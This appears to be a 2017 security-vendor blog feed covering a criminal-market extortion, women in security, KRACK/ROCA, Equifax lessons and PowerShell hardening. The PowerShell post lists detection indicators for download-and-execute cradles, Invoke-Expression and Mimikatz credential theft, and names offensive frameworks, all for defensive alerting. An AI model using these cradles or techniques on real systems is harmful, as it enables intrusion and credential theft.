    We are increasingly used to the tactic of extorting a company through the threat actor publicly releasing data. The recent HBO extortion attempt is a prime example, and actors like thedarkoverlord have also used this approach to a large extent. Digital Shadows has tracked well over 20 of darkoverlord extortion attempts since June 2016. The process is straight forward enough; acquire a company’s valuable data, threaten to release the data if a ransom is not paid, and then put pressure on the victim through sharing the data with journalists. But cybercriminals also face this risk themselves. In this case, a criminal marketplace is the victim of an extortion attempt. Is there any trust left in criminal marketplaces?

    Extorters going to extort 1 

    Fig 1 – An advertisement for basetools on another criminal forum


    On October 24th, a user posted on Pastebin claiming to have accessed customer details and administrator accounts of Basetools, an online criminal marketplace. The user also claimed to have obtained personal details of the administrator and demanded $50,000 in ransom, or he would release further information and the dox of the administrator. The post threatened to inform law enforcement should the payment not be made. At the time of writing, the Basetools market was “under update ” and claimed it would be back in “a few days”.

    Extorters going to extort 2 

    Fig 2 – The message received when accessing Basetools on 25 October 2017


    Basetools is a criminal marketplace that is often advertised within Russian-speaking criminal forums and marketplaces. The site allows vendors and buyers to trade credit card information, customer accounts, and spamming tools. The site claims to offer over 150,000 accounts, 20,000 tools and 24/7 support.

     Extorters going to extort 3

    Fig 3 – A screenshot provided by the extortionist, claiming to show access to the admin support panel

     One motivation behind the threat is clearly financial, but that does not tell the entire story. The actor claims that the administrator of the site has been manipulating the vendors, creating false personas and falsely elevating those vendor profiles to the top of listings.


    What’s the Impact?

    For many years, the criminal marketplace – whether that is on the dark or deep web – has been the preserve of cybercriminals, allowing them to easily advertise and sell their illicit goods. However, this has experienced a significant shift in the past 4 months with the demise of AlphaBay and Hansa marketplaces.

    We have previously forecasted the potential shift from centralized marketplaces to more decentralized models and the conditions that would have to exist for this to become a reality. The attempted extortion of Basetools, and in particular the allegations of a admin manipulating vendor ratings is yet another reason for cybercriminals to reconsider the idea of a centralized market. In a decentralized model, the risk of this occurring would be reduced.

    While the conditions for a decentralized model taking the lead may not yet be there, this may take us one step further. In future posts, we’ll be looking at the recent adoption of the decentralized model and the implications of it.

    Women in Security: Where We Are And Where We Need To Go Wed, 25 Oct 2017 15:34:27 +0000 Ada Lovelace, Grace Hopper, Katherine Johnson, Radia Perlman—some of history’s greatest technical minds have been women. However, since the mid-1980s, there has been a devastating decline in the number of female computer science and engineering graduates. This is even more clearly reflected in the modern workforce—especially within Information Security.

    Women in security 1 

    Source: Pixabay

    While women make up nearly half of the American and European workforces and 40 percent of it worldwide, according to the ISC2017 Women in Cybersecurity report, only 11 percent of global Information Security professionals are women. Many women also have difficulty moving up in their careers, despite reporting higher education levels and qualifications than their male counterparts. Furthermore, at all levels, men also earn more than women, are nine times more likely to be promoted to managerial roles, and four times as likely to hold C-level positions.

     Women in security ICS

    Source: Center for Cyber Safety and Education


    So, why aren’t there more women in security and what’s keeping those of us who are from excelling? While there is no single answer, part of this can be traced back to a trend that became prominent in 80s pop culture, when computers became labeled as something only ‘nerdy’ guys should enjoy—think Revenge of the Nerds, or the more modern-day IT Crowd—where male leads are portrayed as socially awkward and computer-obsessed.

    Women in security IT Crowd

    Source: Pinterest

    In addition, personal computers became a household norm. According to an NPR article entitled, “When Women Stopped Coding,” this trend was seen in much more homes with male children than those with female children. Therefore, the sheer lack of exposure to computers, again, diverted a lot of young women away from an interest in tech. Many more boys grew up with the opportunity to excel in coding, security, and other computer-related disciplines, not only from an early age, but from home—setting a nearly impossible bar for young women to reach.

    As far as the workforce is concerned, tech has quite an unfortunate retention rate for women as well, as many women end up switching careers after some time in a technical role. Personally, before I even took my first security course in undergrad, I was warned by another woman in the field that I would need “a very thick skin” to succeed. She was absolutely correct and this is something I learned quickly on my own, as well. This is not okay and it should absolutely not be the standard.

    Furthermore, according to the ISC2 report, 51 percent of women have experienced discrimination within the field, with only 15 percent of men reporting the same. According to these reports, this also happens even more frequently as women excel in their careers. In addition, while unemployment rates in tech are lower than many other fields, according to Dice, for women it’s the opposite. And with other issues such as pay inequity and gender discrimination, women face a very steep uphill battle if they truly want a future in this field.



    In modern day Silicon Valley, a few women have been willing to speak out against these injustices. Women like Ellen Pao, famous for her gender discrimination lawsuit, and Susan Fowler, for her blog on the toxic working culture for women in tech. However, despite this, little has changed.

    Back to security, with the big push for women to learn how to code at female-focused coding camps like Hackbright and Girls Who Code, the number of female software developers is on the rise. In fact, according to the US Bureau of Labor Statistics, 20 percent of software/web developers are female. However, this same push is not reflected in security, clarified by the aforementioned statistic with only 11 percent of InfoSec professionals being women. This also rings true at events and meetups focused on women in tech. Other women have looked at me strangely and become a bit cliquey in these situations, once I’ve shared that I work in security and not software development. Because of this, women in security can still feel left out, even in a room full of female tech professionals.

    This is very problematic because of an increasing demand for workers with cybersecurity skills. A major lack of women in the field, therefore results in less people to fill these much-needed positions. On top of that, women should be encouraging other women in tech, regardless of their specific discipline.

    According to a study from the “Center for Cyber Safety and Education”, there is a projected gap of 1.8 million unfilled cybersecurity jobs by 2022. A push for women to enter the security workforce would not only aid in closing this, but businesses with a more even distribution of men and women have seen up to a 41 percent increase in revenue. And companies with at least three female directors have seen over a 66 percent increase in invested capital. Workplaces with more gender diversity also see higher customer satisfaction, productivity, and profitability.



    So, how do we change this? I think the first thing that needs to be considered is a strong outreach to young girls. This is not only critical, but needs to begin very early at the elementary level. According to a survey conducted by Microsoft, girls lose interest in STEM when they hit their early teenage years. In addition, 60 percent of them report that they are intimidated by the tech field because of the unequal numbers and stereotypes.

    1. Get engaged at a young age – and stay engaged. It’s important to inspire girls at a young age with hands-on workshops, camps, and other experiences. While coding camps are fantastic, a rise in security camps needs to happen, as well. We need to encourage our young girls who are excited about logic and problem solving to recognize how they can one day make a career out of it. And finally, it needs to be fun. We need to inspire young girls to excel in tech in the same way we do with young boys. The Girl Scouts of America, with their superstar rocket scientist CEO, have teamed up with Palo Alto Networks, and are making strides in the right direction. In 2018, the Girl Scouts will begin offering a range of cybersecurity badges. Hopefully other organizations will begin to follow this example.

    Women in security 4 

    Source: Pixabay

    2. Powerful role models. Another change that needs to happen, is for girls to become less intimidated by the industry itself. Personally, I was always interested in tech, but also terrified by the idea of entering such a male-dominated field. This is enough to dissuade many women from even giving it a chance. A focus on powerful female role models within tech and security is paramount. I’d love to see more lists like this:

     Women in security 5

    Source: Pixabay

    3. Keep up progress where it exists. On a positive note, according to the ISC2 report, millennials may have a chance to change this downward trend due to an increased number of women entering computer science and engineering degree programs. This increase is likely due to the focus on technology, which has occurred within our lifetime. In fact, just last year, more women graduated with engineering degrees than men at Dartmouth, and several other universities are working to follow suit. Last year, the Oracle Academy also pledged $3M and began the international Let Girls Learn initiative with the White House in order to help expose more young girls to STEM.


    Encouragement early on is key, as girls lose interest in tech at a very young age. Inspiring them to embrace their abilities and to recognize the opportunities at hand is an excellent start. Work needs to be put in by people across many industries—whether its security, education, or community organizations—in order to become a driving force to not only embrace women within the field, but to close a very serious, impending employment gap within it, as well. Negative stereotypes about tech need to become a thing of the past, and positive female role models need to be lifted up and exemplified. Without any of this, the cybersecurity industry is going to continue to lack diversity, and soon flounder, as demand increases, but our standards continue to live in the past.

    Trust vs Access: A Tale of Two Vulnerability Classes Fri, 20 Oct 2017 15:32:55 +0000 It’s been a big week in cyberspace, with high profile crypto vulnerabilities KRACK (affecting WPA2) and ROCA (affecting RSA keys generated by Infineon hardware) hitting the news. Not only these mammoth bugs were released, but a new Adobe Flash 0-day exploit was observed in the wild being used to install the FinSpy commercial malware, and finally, the DDE feature in Microsoft Office was found to be open to abuse to gain code execution. There has been a great deal of discussion on Twitter and elsewhere on the comparative severity of the different vulnerabilities and, in particular, how the crypto bugs were not as severe as initially thought.



    I think the vulnerabilities are all interesting in their own way and it’s helpful to delineate the differences between them. Both the crypto bugs represent an attack on trust, that is, they undermine the trust that people and organizations have in security systems to protect them. WPA2 is used almost exclusively to secure WiFi networks around the globe and the consequences of a loss of trust in the protocol are severe. Many organizations will launch vast programs to ensure that they’re protected, equipment will be ripped and replaced and countless meetings will be held on the topic. Even though the risk, as it stands today, is low (a limited Proof of Concept code available and Microsoft Windows is relatively unaffected). In addition, requiring physical access also raises the bar to a successful attack. The perception, however, is that WPA2 is imperiled.

     KRACK logo

    Figure 1 – KRACK attack logo (

    A similar story exists for the ROCA vulnerability. Infineon products are used by many different types of crypto equipment used for software signing, Trusted Platform Managers (TPM), identity documents, certain authentication tokens, etc.. For each RSA key of 1024 or 2048 bit length which has been generated by a piece of hardware, it must first be established if a vulnerable Infineon chip was used to generate the key, secondly, one of the various tools must be used to verify that the key is not easily factorized due to the key generation vulnerability. Due to the prevalence of the vulnerable chips and the diversity of the equipment that they are used in, this verification process will be costly both in terms of money and time.

    ROKA impact 

    Figure 2 – ROCA impact diagram


    This week Kaspersky Lab released a report on the usage of an Adobe Flash 0-day against Middle Eastern targets by the Black Oasis APT actor. The detection of the exploit resulted in Adobe issuing an out-of-band critical patch and the Chrome browser blocking the usage of vulnerable versions of Flash. The exploit was part of an attack that delivered the FinSpy commercial malware to selected targets, most likely for espionage purposes. While this attack demonstrates once again the validity of Adobe’s decision to retire Flash in 2020 and the importance of removing Flash entirely or enforcing click-to-play and mandatory patching, now this attack has been burned, the immediate danger has passed for many users. Anti-virus definitions have been updated, patches issued and many, but obviously not all, endpoints are now protected against this attack. The real danger of such exploits is, once they’ve been found in the wild, they often find their way into Exploit Kits and other attack toolkits which are used to exploit unpatched systems.

    Adobe security update for CVE 2017 11292 

    Figure 3 – Adobe security update for CVE-2017-11292

    The final big news story was the discovery by SensePost of a method of gaining remote code execution from Microsoft Office documents by abusing a legacy feature called DDE. In a method similar to VBA macros or OLE embedded objects in Microsoft Office, the DDE technique does not require exploitation of a vulnerability, but rather rests on a user clicking through a confusing prompt which permits the attacker’s payload to be executed. While SensePost contacted Microsoft concerning the issue, it was deemed that the DDE feature was working as expected and would not be immediately patched. Numerous attacks have already been observed in the wild using this technique and, so far, many defenders are struggling to keep attackers using this approach out of their networks.

    Prompt separating the user from system compromise

    Figure 4 – Prompt separating the user from system compromise

    The crypto attacks KRACK and ROCA are very different in their impact compared to the Adobe Flash 0-day and the Microsoft Office DDE issue. The crypto attacks are attacks on trust. Organizations deploying WPA2 and RSA-based encryption have to rely on the supply chain providers performing their due diligence on the products that they provide. This applies particularly to the ROCA attack where it is still unknown the full extent of the issue. More and more products are being discovered as generating vulnerable keys and we can expect that we will be having to check for weak keys for a long time to come.

    The Flash 0-day and DDE issue are ways for attackers to gain initial access to a network, mitigations exist in terms of patching or disabling features, but once they have been dealt with, an organization can have a reasonable amount of confidence that they are resilient against attacks using these particular vectors. However, the uncertainty spread by attacks which undermine systems we use for protection is more insidious. The trust we have in these systems turns out to have been misplaced.

    When assessing the impact of a vulnerability, it is worth keeping in mind what the consequences of the vulnerability are:

    • Is it a tool for providing unauthorized access to an attacker?
    • Or is it undermining the trust we have in the security systems we have built?

    In terms of response, if unauthorized access to our networks is discovered, the response can be tactical and immediate, that is, a standard incident response. The response to an attack on trust must be more long-term and strategic. It must take into account the uncertainty around the lifetime and impact of the issue, these attacks on trust may live on for years in the most unexpected places.

    Key Reinstallation Attacks (KRACK): The Impact So Far Mon, 16 Oct 2017 15:02:12 +0000 Today, a series of high-severity vulnerabilities affecting the WiFi Protected Access II (WPA2) protocol were disclosed. Security researchers have developed a proof of concept (POC) demonstration, dubbed “KRACK”, and a dedicated website through which further details are likely to be released.

    An advisory was distributed by the US CERT to a select number of unidentified organizations stating the following malicious activities could occur should an attacker successfully exploit the vulnerabilities: decryption, packet relay, TCP connection hijacking, and HTTP content injection attacks.

    Here’s what we know – and do not yet know – so far.



    It’s likely that a large number of devices which use WiFi are exposed to this vulnerability, but only works if the attacker is within the victim’s network range. However, an attack requires the physical presence of an attacker to the victims’ network.



    Fig 1 – A screenshot of a POC demonstration for KRACK. Source: hxxps://www[.]youtube[.]com/watch?time_continue=13&v=Oh4WURZoR98


    Researchers have demonstrated a proof of concept (POC) attack, dubbed “Krack attack”, targeting an Android smartphone; a video for which showed how all the data transmitted by the victim could be decrypted. The video showed a plaintext downgrade attack against TLS/SSL via sslstrip Details of this are available on a dedicated website; hxxps://www[.]krackattacks[.]com/. Linux and Android versions 6.0 and above are particularly effected, though the list of vulnerable devices is extensive.

    Some wireless manufacturers have already developed patches to mitigate against this threat, with Bleeping Computerand US CERT having published useful lists on the latest firmware and driver updates.



    While there is a proof of concept demonstration, there was no proof of concept code released, and no public indication these vulnerabilities had been exploited in the wild. Although the POC video gave a good overview of the exploit, the exact technical knowledge required to successfully conduct this type of attack is unknown.

    We have not yet observed the vulnerability exploited in the wild, although criminals have showed an interest. This is confirmed by conversations on criminal forums, with users interested – yet skeptical – of finding a quick exploit.


    KRACK Forum  

    Fig 2 – Discussion of KRAK on a criminal forum


    The US CERT reiterates that the vulnerabilities could potentially be used to conduct arbitrary packet decryption and injection, TCP connection hijacking, HTTP content injection, or the replay of unicast, broadcast, and multicast frames by conducting a man-in-the-middle (MiTM) style attack. Of course, not all devices are equally affected, but the research paper outlines these differences.

    In order to manage the risk, here’s five steps organizations can take:

    1. Enumerate connected devices. Use your wireless control software to enumerate all connected devices and create an inventory. The connected devices will give an indication of the risk posed. Look out for internet of things, such as printers, and any Android or embedded Linux devices.
    2. Patch your vulnerable connected devices. The first priority is, predictably, to patch vulnerable devices. More patches are expected over the next 24 hours, so monitor for updates. As mentioned earlier in the blog, Bleeping Computer and US CERT have both provided good updates on this.
    3. Adopt a second layer of security. Despite well-known issues with some VPNs, having non-wired internet users connected by VPN is a good interim measure. Adopting cryptographic protocols, such as Transport Layer Security (TLS/SSL), is another option.
    4. Consider a wired connection. Based on the extent to which your connected devices are vulnerable, consider switching to an Ethernet connection. While this might not be scalable for an enterprise campus, it is a consideration should the severity increase over the upcoming days.
    5. Stay up-to-date on the latest KRACK news. There will be more to come, so stayed tuned for further updates.

    Stay up to date with our research. Subscribe here to receive the latest industry news, threat intelligence and security resources.

    Simply Put, Effective Cybersecurity is the Strength Sum of Its Parts Wed, 11 Oct 2017 14:50:10 +0000 Today’s cybersecurity landscape, dominated as it is by professional threat actors, state sponsored attackers and hacktivists, requires a more consistent and integrated approach from governments and businesses around the world to technology vendors. Having the very best solution remains critical, but if it is isolated inside a corporate infrastructure, the bad guys will likely eventually find a way around it.

    Meaningful partnerships with an integrated technology approach bring together best of breed solutions in a manner that enterprises can greatly improve their overall security posture, reducing overall exposure and protecting investment.

    We recognize that while Digital Shadows’ SearchLight solution remains a market leader in digital risk management solving several significant challenges for customers today, by working with market leading technology partners we can offer our mutual customers an incrementally more effective solution to combat the threat of cybersecurity.

    This is why we are excited that today we announced our Digital Risk Management Technology Ecosystem featuring 11 leading security technology companies, with more expected to join in the coming months. We have spent months working diligently to locate partners who all share a vision for how security analytics and security information and event management (SIEM), product orchestration and automation, risk and compliance, intelligence and network enforcement, must work together to best protect customers from today’s digital risks.

    Our initial ecosystem members will bring their individual, industry-proven strengths to enhance Digital Shadows’ intelligence and digital risk management capabilities which extend across the widest range of data sources within the open, deep and dark web to protect customers around the world.

    Just last month we announced similar partnerships with Splunk and ServiceNow and we are convinced that these kinds of alliances and partnerships are the best way to protect our customers around the world so they can maximize and tap the huge benefits the digital economy brings.

    To learn more, read our full press release here.

    Simple Steps to Online Safety Thu, 05 Oct 2017 14:48:15 +0000 On the heels of some very high-profile and disturbing data breaches, this year’s Cyber Security Awareness Month is timely. This October comes after the announcements of major data breach announcements from Equifax, Deloitte and the Securities and Exchange Commission, and with the increased publicity and impact of social media, the attention and respect that cyber security, information security and data security deserves is starting to pick up steam.

    The first step in making changes is building awareness, and this blog in relation to National Cyber Security Month’s Week 1 theme ‘Simple steps to online safety’. This will help consumers understand the threats and how to protect themselves, including what to do if they become a victim of cyber-crime.

    Protecting yourself online may seem impossible, but following simple guidelines like enabling stronger authentication, strong password management, and regular update installation can do wonders to protect you from cybercrime.

    Enable Stronger Authentication

    1. Extra layers of security beyond a password are available from most email providers, social media platforms, and financial institutions. Taking advantage of this multifactor authentication helps assure authorized access to all accounts. Remember that all MFA isn’t made equal; MFA that relies on SMS comes with problems of its own.

    Interconnecter SS7

    Figure 1 – An advertisement for SS7 bypass services on the dark web

    2. Install updates for apps and software on your devices as soon as they are available. Keeping software up to date will prevent cybercriminals from taking advantage of known vulnerabilities.

    3. Do not open emails, links, or attachments from strangers. Phishing attacks often use email or malicious websites or links to infect your device with malware, which can gain access to personal and financial information or accounts.

    Remain Skeptical

    1. As a consumer, stay skeptical. Unless you are dealing with a known and reputable company, those amazing deals are probably amazing frauds. Fake shopping websites are very sophisticated with professional designs often mimicking legitimate sites.

    Online fraudulant goods

    Figure 2 – An advertisement for fraudulent goods on the dark web. Not all offers will be this obvious!

     The domain name is the best giveaway – look out for those that are long, with lots of hyphens, slashes, or special characters that include popular brands or stores, but with extra letters or numbers (e.g., www[.]cheapapp1estuff[.]com).

    3. Also, the URL in the checkout section should start with https:// and have a padlock icon to the left of it indicating SSL encryption; exit immediately if it doesn’t. (Equally, remember that the presence of a padlock icon does not make the site definitely secure!) Don’t assume that links from trusted sites confer legitimacy: Facebook ads have linked to bogus Ray-Ban sites and Instagram promoted a phishing site that lured buyers with discounted Adidas and Coach merchandise.

    Do Your Research On IoT And UPNP Devices

    1. DDoS attacks are only one possible threat from infected IoT devices, and the diversity amongst IoT hardware and software make them extremely difficult to secure. Most IoT devices are meant to be install-and-forget and were not built with patching and updating in mind, thus security maintenance is very challenging if not impossible.

    2. No one is suggesting that you strike those smart TVs or personal drones off your holiday shopping list, but it is imperative for consumers to stay informed. Do your homework – read online reviews and make sure you’re aware of any security issues. The first time you turn the device on, change default passwords and check for updates and patches. Make sure your home Wi-Fi network is secure and avoid public Wi-Fi when possible.

    Use Common-Sense

    1. When shopping online, use a credit card, not debit, to limit your losses in case of fraud. Don’t make purchases or check bank statements over public Wi-Fi, as malicious actors can intercept data, capture your web traffic, or redirect you to malware or phishing sites. If you use public Wi-Fi frequently, consider encrypting your traffic via a personal VPN connection service. Monitor your bank and credit card transactions frequently and set alerts for suspicious activity.

    All members of the public can take some simple actions to protect themselves online and to recover in the event a cyber incident occurs. Cybercriminals often prey on human error – such as people clicking on a link in a phishing email or using weak or repetitive passwords – to gain access to a home networks and financial or social media accounts. You can’t eliminate every risk, but you can keep yourself safer while enjoying this connected world.

    Gearing Up For National Cyber Security Awareness Month Tue, 03 Oct 2017 14:34:01 +0000 I’m going to go out on a limb and say that I’m probably not the only one that’s pleased to see the back of September. The cinders of Equifax breach continue to fall into October and, irrespective of the identities of the actors behind the breach, the impact of the exposed 143 million Social Security Numbers will have a long tail.

    National Cyber Security Month

    In light of this, it’s probably a good time to reflect on the current state of security. Which is just as well, given that we’re two days into the first week of the annual National Cyber Security Month (U.S.) and CyberSecMonth (Europe). It’s a great opportunity to look at ways to overcome the challenges we face. As a reminder, here’s the weekly themes for the U.S. and European respective security awareness months.

    Date United States Theme European Theme
    Week 1: Oct 2-6 Simple Steps to Online Safety Cyber Security in Workplace
    Week 2: Oct 9-13 Cybersecurity in the Workplace is Everyone’s Business Governance, Privacy & Data Protection
    Week 3: Oct 16-20 Today’s Predictions for Tomorrow’s Internet Cyber Security in the Home
    Week 4: Oct 23-27 The Internet Wants YOU: Consider a Career in Cybersecurity Skills in Cyber Security
    Week 5: Oct 30-31 Protecting Critical Infrastructure from Cyber Threats


    The U.S. and European themes do differ a little, but there are three common themes which apply to all organizations across the world.

    1. Increase In Connected Devices, And The Difficulty Of Managing The Risk

    Social media, mobile computing and cloud services have increased the ease and speed of communication, while simultaneously reducing the cost. The “internet of things” looks to add further complexity to this, with some forecasts claiming there will be 200 billion connected devices by 2020.

    This is tricky for organizations to manage, especially when they don’t directly control the flow of information. Employees, suppliers and other third parties are all sharing and exposing sensitive information. Keeping track of what data is shared and when it becomes exposed can cause regulatory headaches, privacy concerns and, ultimately, loss of revenue.

    2. Security Is An Issue Beyond The Security Department

    Week 2’s theme is “Cybersecurity in the Workplace is Everyone’s Business”, which ties into two main areas: building a culture of cybersecurity and security as a strategic issue.

    Building a culture of cybersecurity is something we’ve written about a good amount (here you can read our blogs on Security Culture and Resilience). This is important to ensure every individual within the organization is vigilant and feels like they can report security issues. Security isn’t something that starts and stops at the SOC.

    As Equifax’s share price is testament to, security has strategic implications and, as such, it should be strategically driven. Boards need to understand that weaknesses in an organization’s security posture can have significant strategic implications. At the same time, employees need to do a better job of communicating this risk to the board.

    3.  Security Teams Are Held Back By A Skills Shortage

    In his keynote presentation at the 2017 SANS CTI Summit, Cliff Stoll recalled that he and his team had “Zero budget, zero expertise and zero mandate.” While Cliff was talking about the 1980s, these three challenges remain.

    Hiring good people and building up expertise remain some of the biggest challenges, which is why it’s great to see the focus on skills shortage. The underrepresentation of women in security is a problem that continues to plague the industry, and we’ll be digging deeper into this in Week 2.

    However, a lack of diversity extends beyond gender inequality; it includes the need to train individuals from diverse backgrounds. Having a broader range of backgrounds and skills is important in helping teams avoid falling into groupthink and other cognitive biases.

    We’ll be publishing blogs on these weekly themes, so stay tuned.

    2017 Equifax Breach: Impact and Lessons Learned Thu, 28 Sep 2017 14:24:23 +0000 Equifax experienced a data breach that occurred in mid-May 2017, was first discovered on 29 Jul 2017, and was publicly disclosed by the company on 07 Sep 2017. The breach affected 143 million individuals in the United States, Canada and the United Kingdom. Immediately after the disclosure Equifax faced widespread criticism from the media, researchers and customers. There have also been allegations of insider trading and legal implications. In our paper Equifax Breach: Lessons Learned for Your Organizations, we outline how the events surrounding the breach demonstrate several important learning points organizations can use to inform their own security posture.

    EquifaxReport Lessons Learned

    The largest immediate impact to Equifax was loss of investor confidence; the share price dropped 34 percent within eight days after the breach disclosure. The company also risks revenue loss resulting from reduced business, especially considering customers’ loss of confidence in the company to secure data. As with all data breaches, Equifax will also incur financial losses through its responsive investigations and, likely, costs resulting from lawsuits.

    Swift public criticism followed around Equifax’s security posture, its handling of the breach and the exposure of the sensitive customer data. Some employees have been accused of insider trading, and others have reportedly left their positions, such as the chief security officer and chief information officer. Reputational damage may have a mid- to long-term effect on the company’s revenue generation and a prolonged impact on its finances.

    The key lessons organizations can learn from this event are:

    • Maintain an external view of your digital footprint to be aware of what an attacker can access, what is vulnerable to attack and what methods attackers are using against your sector.
    • Establish and maintain a threat intelligence program, and act on the intelligence; Digital Shadows provided clients with multiple alerts about exploitation of the vulnerability that affected Equifax, prior to the intrusion.
    • Implement and follow general cyber-security good practice measures, such as defense-in-depth and including vulnerability management. Plan as if an attacker will compromise your network and ensure your sensitive information will be protected.
    • Assume a breach will occur and plan for this outcome. Ensure people, processes and strategy are in place in advance of it.
    • Control knowledge of a breach to trusted individuals and prepare for announcements by analyzing the possible consequences of decisions.
    • Communicate clearly when a breach happens, stating the knowns and unknowns publicly. Speculation from media and researchers can damage reputation.
    • Look for your compromised data online, to try to discern the attacker’s motive. Understanding whether the motive was financial gain may help mitigate against prolonged malicious activity.

    Download a copy of our paper to learn more about the impact of the breach and the lessons organizations can learn at three different stages: pre-breach, post-discovery and post-disclosure.

    PowerShell Security Best Practices Wed, 27 Sep 2017 12:45:18 +0000 Threat actors have long since used legitimate tools to infiltrate and laterally move across defender’s networks. The reasons for this are clear; the likelihood of being detected is much lower when authorized tools are leveraged instead of malicious tools that might trigger prevention or detection controls. PowerShell attributes have also made it attractive to adversaries, having been used most recently in the Petya/NotPetya campaign. In this blog, we will cover some PowerShell best practices that will prepare you for adversaries who will use your own PowerShell implementation against you.


    PowerShell is an automation platform and scripting language for Microsoft Windows and Windows Server, which allows you to simplify your system management. Unlike other text-based shells, PowerShell harnesses the power of Microsoft’s .NET Framework, providing rich objects and a massive set of built-in functions to take control of your Windows environments.

    Windows PowerShell


    PowerShell has been used heavily for cyber attacks, especially recently during the Petya/NotPetya campaigns. The most important aspect for attackers is its native integration with the .NET Framework, which offers multiple options for infecting or manipulating the target.

    PowerShell’s most attractive attributes to adversaries are:

    • Simple access to network sockets
    • Ability to assemble malicious binaries dynamically in memory
    • Direct access to the Win32 Application Programming Interface (API)
    • Simple interface with Windows Management Instrumentation (WMI)
    • Powerful scripting environment
    • Dynamic, runtime method calls
    • Easy access to crypto libraries, e.g. IPSec, hashing algorithms
    • Ability to hook managed code
    • Simple bindings to Component Object Model (COM) (

    All the above render PowerShell an extremely effective attack vector.

    PowerShell was initially mentioned as an attack platform in 2010 (, when it was presented at Def Con 18 as proof of concept. Both a bind and reverse shell programmed purely in PowerShell were demonstrated in the same context.

    There are numerous attack tools – like Nishang, PowerSploit, and PowerShell Empire platform (www.PowerShellempire[.]com)  –  that offer a post-exploitation agent built on cryptological communications. These tools can be used for reconnaissance, persistence, and lateral movement, as well as other offensive techniques. Of course, given its native capabilities, PowerShell can be programmed in multiple ways, providing custom tools and techniques to remain stealthy and undetected by common security controls and countermeasures.

    Adversarial Tactics, Techniques & Common Knowledge, or ATT&CK by Mitre, which provides an extensive list of attack vectors, tactics, and techniques, describes PowerShell as a powerful interface that adversaries can use to perform a variety of actions, and provides real-world examples.


    Given that PowerShell cannot be disabled or removed from organizations that require it, the following actions are the recommended best practices to use PowerShell efficiently while preventing its use as an attack vector.

    1. PSLockDownPolicy And PowerShell Constrained Language Mode

    Constrained language mode limits the capability of PowerShell to base functionality, removing advanced feature support, such as .NET and Windows API calls and COM access. This lack of advanced functionality stops most PowerShell attack tools, because they rely on these methods. However, in enterprise environments it can negatively affect legitimate scripts; thus it is highly recommended to schedule a testing period before activating this option, to filter out the legitimately used code.

    Enable Constrained Language Mode:
    [Environment]::SetEnvironmentVariable(‘__PSLockdownPolicy‘, ‘4’, ‘Machine‘)

    Enable via Group Policy:
    Computer Configuration\Preferences\Windows Settings\Environment (

    2. PowerShell V.5 With Applocker And Device Guard

    PowerShell v.5 comes with significant embedded security features that make its use more secure for enterprise environments. These security features include:

    • Script block logging. Script block logging provides the ability to log de-obfuscated PowerShell code to the event log.
    • System-wide transcripts. System-wide transcription can be enabled via Group Policy and provides an “over the shoulder” transcript file of every PowerShell command and code block executed on a system by every user on that system.
    • Constrained PowerShell. Constrained Language mode (as described above in best practice 1).
    • Antimalware integration (Windows 10). The new Windows 10 Antimalware Scan Interface (AMSI) enables all the scripting engines (PowerShell, VBScript, and JScript) to request analysis of dynamic content: from a script file, typed commands at the command line, and even code downloaded and executed in memory. This enables scanning of PowerShell code before it is executed on the computer.

    In addition, using Applocker to block executables from unwanted user locations will provide better control.

    Device Guard which is also applicable on Windows 10 and Windows Server 2016 can be used to enforce constrained language mode and application whitelisting by leveraging advanced hardware features where supported. (

    3. Logging PowerShell Activity

    PowerShell logging can be enabled via Group Policy for PowerShell modules:

    • Microsoft.PowerShell.* (i.e., Microsoft.PowerShell.Management module) – Logs most of PowerShell’s core capability.
    • ActiveDirectory – Logs Active Directory cmdlet use. A lightweight Windows PowerShell script that performs a single function.
    • BITS Transfer – Logs use of Background Intelligent Transfer Service (BITS) cmdlets.
    • CimCmdlets (2012R2/8.1) – Logs cmdlets that interface with Common Information Model (CIM).
    • GroupPolicy – Logs Group Policy cmdlet use.
    • Microsoft.WSMan.Management – Logs cmdlets that manage Web Services for Management (WS-Management) and Windows Remote Management (WinRM).
    • NetAdapter/NetConnection – Logs Network-related cdmdlets.
    • PSScheduledJob/ScheduledTasks (PSv5) – Logs cmdlets to manage scheduled jobs.
    • ServerManager – Logs Server Manager cmdlet use.
    • SmbShare – Logs Server Message Block (SMB) sharing activity.

    For these logs to be useful, they need to be fed into a central logging system with alerts configured for known attack methods.

    Relevant activity:

    • Downloads via .Net (New-Object Net.WebClient).DownloadString)
    • Invoke-Expression (and derivatives: “iex”)
    • BITS activity 
    • Scheduled Task creation/deletion
    • PowerShell Remoting

    The best method to detect PowerShell attack code is to look for key indicators – code snippets required for the code to run correctly.

    Example: Detecting Mimikatz (a widely-used tool for logged user credential capture)
    Invoke-Mimikatz Event Log Keywords:


    “System.Reflection.Emit.AssemblyBuilderAccess “




    For obfuscated PowerShell, custom rules should be developed. For example:

    • Look for lots of brackets { }
    • Look for lots of quote marks ‘ ”

    Both of these are heavily used in obfuscation techniques and usually are not used by legitimate software or normal administrators.

    4. Remove PowerShell V.2

    It is obvious that the security features integrated in the latest versions of PowerShell do not apply to v.2, which makes its use very attractive to adversaries; PowerShell v.2 can be used for lateral movement and persistence techniques with the same functionality. PowerShell v.2’s extra value is that because it does not have native logging capabilities, it remains undetected and offers stealth in attacker operations.

    For that and other reasons Microsoft has recently announced that PowerShell v.2 will be deprecated from the next Windows 10 Update which is scheduled for this September (, so either way it is highly recommend to check and remove PowerShell v.2 from your environment.

    You can check whether Windows PowerShell 2.0 is installed by running the following (as an administrator).

    • On Windows 7/8.1/10, the following will return a State as either Enabled or Disabled:
      • Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2
    •  On Windows Server, the following will return an InstallState of either Installed or Removed:
      • Get-WindowsFeature PowerShell-V2

    5. Just Enough Administration – JEA

    This is included with the latest update of Windows Management Framework 5.0 and 5.1, and is a security technology that helps organizations enforce information security by restricting IT administrative rights. JEA provides a practical, role-based approach to set up and automate restrictions for IT personnel, and reduces the risks associated with providing users with full administrative rights following the principle of least privilege.

    JEA is implemented as a Windows PowerShell session endpoint (it requires PS remoting to be enabled), which includes a PowerShell Session Configuration file and one or more Role Capability files.

    • PowerShell Session Configuration file. This file is used to specify who can connect to an endpoint. Users and security groups can be mapped to specific management roles. Those files are specific to each machine, so an access control per machine is available. They contain information of what will be the name of the JEA endpoint, which roles will be assigned and of course who will have access to this endpoint. These files are PowerShell data files ending in a .pssc extension (
